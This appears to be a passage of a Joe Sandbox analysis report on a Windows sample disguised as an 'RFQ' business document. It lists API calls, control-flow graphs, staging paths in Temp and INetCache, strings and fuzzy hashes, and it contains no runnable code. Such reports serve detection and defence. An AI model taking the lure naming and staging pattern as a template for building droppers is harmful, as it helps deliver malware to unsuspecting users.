                                                                                                            • Instruction ID: e0a93677b1043ce4e8fea40acd1fa81b7363c56b112b112c42ce1ea238d19e9d
                                                                                                            • Opcode Fuzzy Hash: 16ccbc1a4839035df8dee6c69b1955b51d84c24cc9eb413e0f302de5cc057626
                                                                                                            • Instruction Fuzzy Hash: 87118E71A00108BFEB10AFA5DE89EAEB67DEB44358F11403AF904B61D1D7B85E409668

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 827 405683-4056ce CreateDirectoryW 828 4056d0-4056d2 827->828 829 4056d4-4056e1 GetLastError 827->829 830 4056fb-4056fd 828->830 829->830 831 4056e3-4056f7 SetFileSecurityW 829->831 831->828 832 4056f9 GetLastError 831->832 832->830
                                                                                                            APIs
                                                                                                            • CreateDirectoryW.KERNELBASE(?,0040A300,C:\Users\user\AppData\Local\Temp\), ref: 004056C6
                                                                                                            • GetLastError.KERNEL32 ref: 004056DA
                                                                                                            • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 004056EF
                                                                                                            • GetLastError.KERNEL32 ref: 004056F9
                                                                                                            Strings
                                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 004056A9
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2051518196.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2049815189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054085715.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2056371726.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                            • API String ID: 3449924974-3081826266
                                                                                                            • Opcode ID: 9e16c060b6dacf19867b3a219a4d1c108d16143e5081b661a232c151e35074dd
                                                                                                            • Instruction ID: b9d54522e8c2a6a11acfe34e4faeeda892d25e5cd719c7a25251d408d6c76708
                                                                                                            • Opcode Fuzzy Hash: 9e16c060b6dacf19867b3a219a4d1c108d16143e5081b661a232c151e35074dd
                                                                                                            • Instruction Fuzzy Hash: C8011A71D00619DBDF009FA0CA487EFBBB8EF14315F50443AD549B6190E7799604CFA9

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 833 10001759-10001795 call 10001b18 837 100018a6-100018a8 833->837 838 1000179b-1000179f 833->838 839 100017a1-100017a7 call 10002286 838->839 840 100017a8-100017b5 call 100022d0 838->840 839->840 845 100017e5-100017ec 840->845 846 100017b7-100017bc 840->846 847 1000180c-10001810 845->847 848 100017ee-1000180a call 100024a9 call 100015b4 call 10001272 GlobalFree 845->848 849 100017d7-100017da 846->849 850 100017be-100017bf 846->850 854 10001812-1000184c call 100015b4 call 100024a9 847->854 855 1000184e-10001854 call 100024a9 847->855 871 10001855-10001859 848->871 849->845 856 100017dc-100017dd call 10002b5f 849->856 852 100017c1-100017c2 850->852 853 100017c7-100017c8 call 100028a4 850->853 859 100017c4-100017c5 852->859 860 100017cf-100017d5 call 10002645 852->860 866 100017cd 853->866 854->871 855->871 869 100017e2 856->869 859->845 859->853 870 100017e4 860->870 866->869 869->870 870->845 875 10001896-1000189d 871->875 876 1000185b-10001869 call 1000246c 871->876 875->837 881 1000189f-100018a0 GlobalFree 875->881 883 10001881-10001888 876->883 884 1000186b-1000186e 876->884 881->837 883->875 886 1000188a-10001895 call 1000153d 883->886 884->883 885 10001870-10001878 884->885 885->883 887 1000187a-1000187b FreeLibrary 885->887 886->875 887->883
                                                                                                            APIs
                                                                                                              • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D83
                                                                                                              • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D88
                                                                                                              • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D8D
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 10001804
                                                                                                            • FreeLibrary.KERNEL32(?), ref: 1000187B
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 100018A0
                                                                                                              • Part of subcall function 10002286: GlobalAlloc.KERNEL32(00000040,00001020), ref: 100022B8
                                                                                                              • Part of subcall function 10002645: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,100017D5,00000000), ref: 100026B7
                                                                                                              • Part of subcall function 100015B4: lstrcpyW.KERNEL32(00000000,10004020,00000000,10001731,00000000), ref: 100015CD
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2059627724.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2059614573.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2059642790.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2059657553.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_10000000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Global$Free$Alloc$Librarylstrcpy
                                                                                                            • String ID:
                                                                                                            • API String ID: 1791698881-3916222277
                                                                                                            • Opcode ID: 3820d06b2144ad54ebddf171c2200ffff0f7cb9118403e7eb0aa07fa6a87fa13
                                                                                                            • Instruction ID: d353a68b508970880cf9150dbe01e0f77130c4103e9cfdf2e47557ee24e57a3c
                                                                                                            • Opcode Fuzzy Hash: 3820d06b2144ad54ebddf171c2200ffff0f7cb9118403e7eb0aa07fa6a87fa13
                                                                                                            • Instruction Fuzzy Hash: 5E31BF75804241AAFB14DF749CC9BDA37E8FF053D0F158065FA0A9A08FDF74A9848761

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 890 405c59-405c65 891 405c66-405c9a GetTickCount GetTempFileNameW 890->891 892 405ca9-405cab 891->892 893 405c9c-405c9e 891->893 895 405ca3-405ca6 892->895 893->891 894 405ca0 893->894 894->895
                                                                                                            APIs
                                                                                                            • GetTickCount.KERNEL32 ref: 00405C77
                                                                                                            • GetTempFileNameW.KERNELBASE(0040A300,?,00000000,?,?,?,00000000,0040329E,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00405C92
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2051518196.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2049815189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054085715.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2056371726.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CountFileNameTempTick
                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                            • API String ID: 1716503409-678247507
                                                                                                            • Opcode ID: cb5392dd6a621c673a260bf01be68eb44352edb4da8eb2a8f5e3bee52ca40139
                                                                                                            • Instruction ID: f587d7e23cd8e79aba5dfcc9fd1c49406dd64d8aef4a88ed345cfe548f7336ea
                                                                                                            • Opcode Fuzzy Hash: cb5392dd6a621c673a260bf01be68eb44352edb4da8eb2a8f5e3bee52ca40139
                                                                                                            • Instruction Fuzzy Hash: BAF06D76A00708BFEB008B59ED05A9FBBA8EB91750F10403AE900F7180E6B49A548B68

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 896 4063bf-4063df GetSystemDirectoryW 897 4063e1 896->897 898 4063e3-4063e5 896->898 897->898 899 4063f6-4063f8 898->899 900 4063e7-4063f0 898->900 902 4063f9-406428 wsprintfW LoadLibraryW 899->902 900->899 901 4063f2-4063f4 900->901 901->902
                                                                                                            APIs
                                                                                                            • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004063D6
                                                                                                            • wsprintfW.USER32 ref: 00406411
                                                                                                            • LoadLibraryW.KERNELBASE(?), ref: 00406421
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2051518196.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2049815189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054085715.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2056371726.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                            • String ID: %s%S.dll
                                                                                                            • API String ID: 2200240437-2744773210
                                                                                                            • Opcode ID: ebb0f172caec6dc837d07c814eb63f6b49a53cdbd21dad16a8e1c45d76cddad1
                                                                                                            • Instruction ID: 897e15d25a7328917349fb3201836a7725472686ce540cc24b04093dc9f4d60a
                                                                                                            • Opcode Fuzzy Hash: ebb0f172caec6dc837d07c814eb63f6b49a53cdbd21dad16a8e1c45d76cddad1
                                                                                                            • Instruction Fuzzy Hash: 81F0BB7051011997DB14AB68EE4DE9B366CEB00305F11447E9946F20D1EB7CDA69CBE8
                                                                                                            APIs
                                                                                                              • Part of subcall function 00405AB4: CharNextW.USER32(?,?,0042FA70,0040A300,00405B28,0042FA70,0042FA70,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405866,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe"), ref: 00405AC2
                                                                                                              • Part of subcall function 00405AB4: CharNextW.USER32(00000000), ref: 00405AC7
                                                                                                              • Part of subcall function 00405AB4: CharNextW.USER32(00000000), ref: 00405ADF
                                                                                                            • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 00401612
                                                                                                              • Part of subcall function 00405683: CreateDirectoryW.KERNELBASE(?,0040A300,C:\Users\user\AppData\Local\Temp\), ref: 004056C6
                                                                                                            • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\Khans,?,00000000,000000F0), ref: 00401645
                                                                                                            Strings
                                                                                                            • C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\Khans, xrefs: 00401638
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2051518196.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2049815189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054085715.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2056371726.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                            • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\Khans
                                                                                                            • API String ID: 1892508949-1138960293
                                                                                                            • Opcode ID: 52ccde5ccace11c1ffa7f9329ea0f8b807946ffbe1ca103446376b1a06abf216
                                                                                                            • Instruction ID: 2a65e9898054e9c842dee46b5c7982ab048171bb6952f998b4aca48d6bd22bb3
                                                                                                            • Opcode Fuzzy Hash: 52ccde5ccace11c1ffa7f9329ea0f8b807946ffbe1ca103446376b1a06abf216
                                                                                                            • Instruction Fuzzy Hash: 96119331504504EBCF20BFA4CD4599E36A1EF44368B25093BEA46B62F2DA394A819E5D
                                                                                                            APIs
                                                                                                            • IsWindowVisible.USER32(?), ref: 00405157
                                                                                                            • CallWindowProcW.USER32(?,?,?,?), ref: 004051A8
                                                                                                              • Part of subcall function 00404165: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404177
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2051518196.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2049815189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054085715.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2056371726.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$CallMessageProcSendVisible
                                                                                                            • String ID:
                                                                                                            • API String ID: 3748168415-3916222277
                                                                                                            • Opcode ID: 2462b0bd117cba3fac64a39f9691424f836373fd1b16367001445a14a5683044
                                                                                                            • Instruction ID: 0347cf6c5ba133ca8876b90c0990050b6d60b288702db1d6ba02f1018bbb4e5f
                                                                                                            • Opcode Fuzzy Hash: 2462b0bd117cba3fac64a39f9691424f836373fd1b16367001445a14a5683044
                                                                                                            • Instruction Fuzzy Hash: 4C017C71A00609ABDF214F51DD80FAB3B26EB84754F104036FA047E1E1C77A8C92DE69
                                                                                                            APIs
                                                                                                            • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00401FEE
                                                                                                              • Part of subcall function 004051B4: lstrlenW.KERNEL32(0042C248,00000000,0041D820,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
                                                                                                              • Part of subcall function 004051B4: lstrlenW.KERNEL32(0040318B,0042C248,00000000,0041D820,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
                                                                                                              • Part of subcall function 004051B4: lstrcatW.KERNEL32(0042C248,0040318B,0040318B,0042C248,00000000,0041D820,74DF23A0), ref: 0040520F
                                                                                                              • Part of subcall function 004051B4: SetWindowTextW.USER32(0042C248,0042C248), ref: 00405221
                                                                                                              • Part of subcall function 004051B4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
                                                                                                              • Part of subcall function 004051B4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
                                                                                                              • Part of subcall function 004051B4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F
                                                                                                            • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401FFF
                                                                                                            • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 0040207C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2051518196.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2049815189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054085715.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2056371726.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                                            • String ID:
                                                                                                            • API String ID: 334405425-0
                                                                                                            • Opcode ID: d6ec45678292224ccfbfce22950c847036d7a08cdbcb07fa7d0387c0f9533a57
                                                                                                            • Instruction ID: 561ed2f99fcd8f3c69216c61aae9e950b585f3ecd418fa9455324ea25216acba
                                                                                                            • Opcode Fuzzy Hash: d6ec45678292224ccfbfce22950c847036d7a08cdbcb07fa7d0387c0f9533a57
                                                                                                            • Instruction Fuzzy Hash: 8221A731900209EBDF20AF65CE48A9E7E71BF00354F20427BF510B51E1CBBD8A81DA5D
                                                                                                            APIs
                                                                                                            • GlobalFree.KERNEL32(0065F1A8), ref: 00401BA7
                                                                                                            • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401BB9
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2051518196.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2049815189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054085715.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2056371726.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Global$AllocFree
                                                                                                            • String ID: Call
                                                                                                            • API String ID: 3394109436-1824292864
                                                                                                            • Opcode ID: 3223036e7e2fecee151538c34771c34e58526c9ebab93d957a64f6eea7189736
                                                                                                            • Instruction ID: 27804974e3ca03393c04398de70bc6092cde1ed56c9d8f76027c1228d60f226a
                                                                                                            • Opcode Fuzzy Hash: 3223036e7e2fecee151538c34771c34e58526c9ebab93d957a64f6eea7189736
                                                                                                            • Instruction Fuzzy Hash: 32219072600101EBCB10EFA4CE85E5F77BAAF45324725413BF116B32D1DA78A8519B1D
                                                                                                            APIs
                                                                                                              • Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,0000047C,00000000,00000022,00000000,?,?), ref: 00402CF1
                                                                                                            • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004024CD
                                                                                                            • RegEnumValueW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00000003), ref: 004024E0
                                                                                                            • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nskEAE7.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2051518196.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2049815189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054085715.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2056371726.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Enum$CloseOpenValue
                                                                                                            • String ID:
                                                                                                            • API String ID: 167947723-0
                                                                                                            • Opcode ID: 42b2dd53c8b5802947a3dab0b58a0a50b760338acaf8adbf9a4fd88f57d55a7c
                                                                                                            • Instruction ID: caa0a88e983a87845293d3a09aded013c5498a2120ee6ea3f3930af667db2d56
                                                                                                            • Opcode Fuzzy Hash: 42b2dd53c8b5802947a3dab0b58a0a50b760338acaf8adbf9a4fd88f57d55a7c
                                                                                                            • Instruction Fuzzy Hash: 9FF08171A00204ABEB209F65DE8CABF767CEF80354B10803FF405B61D0DAB84D419B69
                                                                                                            APIs
                                                                                                              • Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,0000047C,00000000,00000022,00000000,?,?), ref: 00402CF1
                                                                                                            • RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,?,?), ref: 0040245B
                                                                                                            • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nskEAE7.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2051518196.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2049815189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054085715.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2056371726.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseOpenQueryValue
                                                                                                            • String ID:
                                                                                                            • API String ID: 3677997916-0
                                                                                                            • Opcode ID: 684252ed4cb5f75002efccf4c3d89688e5a32529c12b8521bce5fdd085325f04
                                                                                                            • Instruction ID: 28617f4b1a8802b5017de0243b5a45cf97da40b04a50325282b533cdbf166070
                                                                                                            • Opcode Fuzzy Hash: 684252ed4cb5f75002efccf4c3d89688e5a32529c12b8521bce5fdd085325f04
                                                                                                            • Instruction Fuzzy Hash: 64115E31911205EBDB14CFA4DA489AEB7B4EF44354B20843FE446B72D0DAB89A41EB59
                                                                                                            APIs
                                                                                                            • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                            • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2051518196.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2049815189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054085715.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2056371726.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend
                                                                                                            • String ID:
                                                                                                            • API String ID: 3850602802-0
                                                                                                            • Opcode ID: 71800ff5d752955c4261f1e4e44e66a702dae3e8c0882f1cfb99089304b670a7
                                                                                                            • Instruction ID: cd3aabbb77ee63ed71f9921c47df44d3aa6e588553b0b950a072bc92d791a3e5
                                                                                                            • Opcode Fuzzy Hash: 71800ff5d752955c4261f1e4e44e66a702dae3e8c0882f1cfb99089304b670a7
                                                                                                            • Instruction Fuzzy Hash: 2101F4316202209FE7095B389D05B6A3698E710319F10863FF851F62F1DA78DC428B4C
                                                                                                            APIs
                                                                                                            • GetModuleHandleA.KERNEL32(?,?,00000020,0040330C,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040643D
                                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00406458
